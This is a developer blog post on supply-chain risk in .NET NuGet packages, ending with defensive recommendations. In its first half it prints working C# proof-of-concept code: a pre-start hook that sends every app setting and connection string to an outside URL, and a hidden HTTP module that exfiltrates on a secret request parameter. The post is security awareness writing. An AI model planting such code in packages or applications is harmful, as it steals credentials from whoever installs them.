I will just add this NuGet package to my application, what’s the worst that could happen?

Nowadays, there is an extensive number of third-party libraries easily available for you to use in your applications. This is great! You can simply focus on your core business logic and re-use all sorts of helpers and frameworks to deliver value a lot faster than you would otherwise. It’s no surprise that some applications have up to 80% of their logic based on external dependencies.

I recently attended the DevSecCon 2017 in London. It was quite an eye-opening and insightful gathering, in which two topics were mentioned a lot: the recent Equifax breach, and vulnerabilities in the code supply chain.

Every time I go to these events I try to think how relevant the subject is to me. Considering my stack is mostly .NET, how vulnerable can it be through my dependencies (or the dependencies of my dependencies, for that matter)? After all, I only use managed code and the CLR will protect me against any malicious intentions, right?

With this in mind I set myself a challenge:
find out the worst thing I could implement in a NuGet package.

The context: what would the impact be if an internal or external NuGet package, or one of its dependencies, were tampered with?

Rules of the game

To make things interesting I set a few rules:

  • The malicious code must be triggered automatically. No methods from my code should need to be explicitly called from the target application, which makes it far easier to inject.
  • Once executed, the code should be able to provide confidential, sensitive or internal information to the attacker.
  • Minimise traceability — making it harder for the code execution to be identified.
  • Be able to be injected at any level of the supply chain — direct dependency, their dependencies, the dependencies of their dependencies, and so on.
  • Impact ASP.NET applications — both MVC and Web APIs.

First Attempt — AppSettings and ConnectionStrings

The initial idea I wanted to prove was whether I could send all (potentially) sensitive information from the configuration file to an external URL.

The key point in this code I would like to highlight is the PreApplicationStartMethod attribute, which allows an assembly to define a piece of code to be executed before anything else in the application. This is quite handy for setup work, like registering modules, but it can also be quite powerful in the wrong hands.
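The original code is not reproduced here, but a minimal sketch of the idea looks like the following. The namespace, class name and endpoint URL are placeholders of my own; the only real requirement is that the hook method is public, static, void and parameterless:

```csharp
using System.Collections.Specialized;
using System.Configuration;
using System.Net;
using System.Web;

// Tells ASP.NET to call EvilPackage.Bootstrap.Start() before the
// application itself starts — no call from the host app is needed.
[assembly: PreApplicationStartMethod(typeof(EvilPackage.Bootstrap), "Start")]

namespace EvilPackage
{
    public static class Bootstrap
    {
        public static void Start()
        {
            var payload = new NameValueCollection();

            // Harvest every AppSettings entry...
            foreach (string key in ConfigurationManager.AppSettings.AllKeys)
                payload.Add("appSetting_" + key, ConfigurationManager.AppSettings[key]);

            // ...and every connection string.
            foreach (ConnectionStringSettings cs in ConfigurationManager.ConnectionStrings)
                payload.Add("connectionString_" + cs.Name, cs.ConnectionString);

            using (var client = new WebClient())
            {
                // Fire-and-forget POST to an attacker-controlled URL
                // (a RequestBin-style endpoint in my experiment).
                client.UploadValues("https://requestb.in/example", payload);
            }
        }
    }
}
```

This compiles against System.Web and System.Configuration, and runs on any ASP.NET Framework site that merely references the assembly.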

To make my life easier, I created a RequestBin page so I did not need to set up a server to record the information received. The result: I did manage to get all entries from both AppSettings and ConnectionStrings sent over to my chosen URL:

Request information from requestb.in

For the most part, I probably ticked all the boxes in my rules. But frankly, I don’t think firing a request at start-up to an external URL would go unnoticed by a diligent developer or sysadmin, so an actual attacker might skip that approach. What could be done to make it a bit harder to trace?

Intercepting Requests

So what about intercepting all requests, but only executing the malicious piece of code when a specific parameter comes in?
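Sketched under the same assumptions as before (placeholder names, and HttpApplication.RegisterModule, which requires .NET Framework 4.5 or later), one way to wire that up is an IHttpModule registered from the same pre-start hook:

```csharp
using System.Web;

// Same trick as before: runs before the application starts.
[assembly: PreApplicationStartMethod(typeof(EvilPackage.ModuleBootstrap), "Start")]

namespace EvilPackage
{
    public static class ModuleBootstrap
    {
        public static void Start()
        {
            // Registers the module programmatically — no web.config
            // entry for an admin to spot.
            HttpApplication.RegisterModule(typeof(InterceptModule));
        }
    }

    public class InterceptModule : IHttpModule
    {
        public void Init(HttpApplication app)
        {
            app.BeginRequest += (sender, e) =>
            {
                var request = ((HttpApplication)sender).Request;

                // HttpRequest's indexer searches the query string, form
                // values, cookies and server variables, so the trigger
                // can hide in any of them.
                if (request["ExploitActive"] == "1")
                {
                    // ...exfiltrate configuration as in the first attempt...
                }
            };
        }

        public void Dispose() { }
    }
}
```

Every request flows through the module, but the site behaves completely normally until the magic parameter arrives.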

I referenced the code above from the default Visual Studio template for MVC applications. That template contains three pages: Home, Contact and About. Notice that the site still works normally, but this time the sensitive data is only exported when a page is called with the parameter ExploitActive=1. As I am using the indexer of HttpRequest, that parameter may come from the query string, form values, cookies or server variables collections, making it harder to trace.

MVC template About page
Same page with the parameter applied

Well, I guess that as soon as you have access to the requests and responses, you can do virtually anything. You could even mix both previous approaches, but submit the sensitive data to the external server through the client side instead, potentially making it even harder to detect.

By now it should be clear that any evil code (intentional or not) within your dependency graph may cause your application to misbehave, potentially leading to sensitive/confidential data being leaked.

My app does not contain sensitive/confidential information, why should I care?

If your application is your own blog, with low traffic, maybe this isn’t a problem at all. However, the same issue exploited in any application within an enterprise could potentially leak:

  • Credentials that are shared with other applications that do have confidential data stored.
  • IPs, domains and server names that could be used for other types of attacks.
  • Connection strings of databases that aren’t network restricted from the internet.

Overall, any extra information can, and probably will, be used against you.

Ok, now show me an easy way to fix this! :)

One of the things you could potentially have used was Code Access Security (CAS). It allowed you to configure your ASP.NET application to run in partial trust, forcing the CLR to run your site in a least-privileged sandbox in which you could fine-tune the permissions you wanted to grant.

With that, if you configured your website to only be allowed to make HTTP requests to a whitelist of domains, anything outside that list would be blocked. Access to machine resources, such as the registry and filesystem, could also be restricted. It wasn’t bullet-proof though, and it would not protect you against the interception of requests shown above, for example.
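For reference, partial trust was enabled through a web.config entry like the one below; the originUrl value here is a hypothetical whitelisted domain pattern:

```xml
<system.web>
  <!-- Legacy CAS: run the site in the Medium trust sandbox.      -->
  <!-- originUrl is a regex of addresses WebPermission will allow -->
  <!-- the application to connect to.                             -->
  <trust level="Medium" originUrl="https://trusted\.example\.com/.*" />
</system.web>
```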

Anyway, that world is long gone: Microsoft has announced that support for Code Access Security and partially trusted code is discontinued in the latest versions of the .NET Framework, and the new .NET Core platform does not even implement the concept.

This leaves you with essentially one option: only add dependencies you fully trust to your project; after all, they will be executed in a full-trust context.

But… who can I trust?

A while ago I read a great post by Phil Haack, in which he proposes four questions you should ask yourself about your NuGet packages:

  1. Who is the author?
  2. Is the author trustworthy?
  3. Do I trust that this software was really written by the author?
  4. Is the author’s means of distributing software tamper resistant and verifiable?

The post is almost five years old and still completely relevant. The NuGet.org team is still working on getting this sorted; on the roadmap they have things such as tamper-proof checksum validation and package signing. That may take some time to land and will only partially solve the problem: it would not help with malicious packages that were never tampered with, for example.

Do your part and take responsibility!

There isn’t a magical solution here. My overall recommendation on the subject is:

Untrusted/unknown NuGet packages

  • Every time you consider using an unknown NuGet package, decompile it and check that there is nothing suspicious in it. Ideally you would do this every time you update to the latest version; however, that is unrealistic unless you automate the process in your pipeline.
  • For open source projects that are not well maintained, fork the repo and ensure you take control of the path-to-live. This will help you ensure the code in the public repo is the same code being packaged. An additional benefit is decreasing the time-to-fix for bugs and security breaches, e.g. when the only maintainer of the project is off on holiday and you need them to approve your changes before a new package can be generated.


  • Verify your application artifacts and their dependencies for tampering in your pipeline. Make sure the same files haven’t changed throughout your path to live.
  • Code securely. Always run your application under least-privileged contexts. Process all user input adequately.
  • Ensure your package repository (ProGet, Nexus, etc.) is security-hardened and has the correct level of auditing.
  • Check for known OSS vulnerabilities in CI/CD. Products such as Snyk, Nexus Lifecycle and Black Duck Hub can be plugged into your pipeline to check whether there is any Common Vulnerabilities and Exposures (CVE) entry reported against the specific versions of your dependencies. They can also notify you once the application is already in production and a new CVE is published.
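The artifact-verification point above can be automated with something as simple as a checksum check. This is a sketch, assuming a hypothetical manifest file of "hash&lt;two spaces&gt;relative-path" lines recorded when the artifact was first built:

```csharp
using System;
using System.IO;
using System.Security.Cryptography;

// Recomputes the SHA-256 of every file listed in a build-time manifest
// and fails (non-zero exit code) if anything has changed since.
class ArtifactVerifier
{
    static int Main(string[] args)
    {
        string artifactDir = args[0];   // folder with the built artifacts
        string manifestPath = args[1];  // manifest produced at build time
        bool ok = true;

        foreach (var line in File.ReadAllLines(manifestPath))
        {
            var parts = line.Split(new[] { "  " }, StringSplitOptions.None);
            var expected = parts[0];
            var file = Path.Combine(artifactDir, parts[1]);

            using (var sha = SHA256.Create())
            using (var stream = File.OpenRead(file))
            {
                var actual = BitConverter.ToString(sha.ComputeHash(stream))
                                         .Replace("-", "")
                                         .ToLowerInvariant();
                if (actual != expected)
                {
                    Console.Error.WriteLine("TAMPERED: " + file);
                    ok = false;
                }
            }
        }

        // A non-zero exit code fails the pipeline stage.
        return ok ? 0 : 1;
    }
}
```

Run it at each stage of your path to live against the same manifest, so a package swapped in between environments is caught before deployment.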

That’s it!

It is definitely clear to me how fragile an application can be against vulnerabilities in its dependency graph, especially when you consider you don’t even need to call a method to get the code executed.

It would be naive to think the problems highlighted above only affect .NET and NuGet. Whatever platform you are using, the application is yours, and whatever you add to your code base is ultimately your responsibility. Remember that and act accordingly.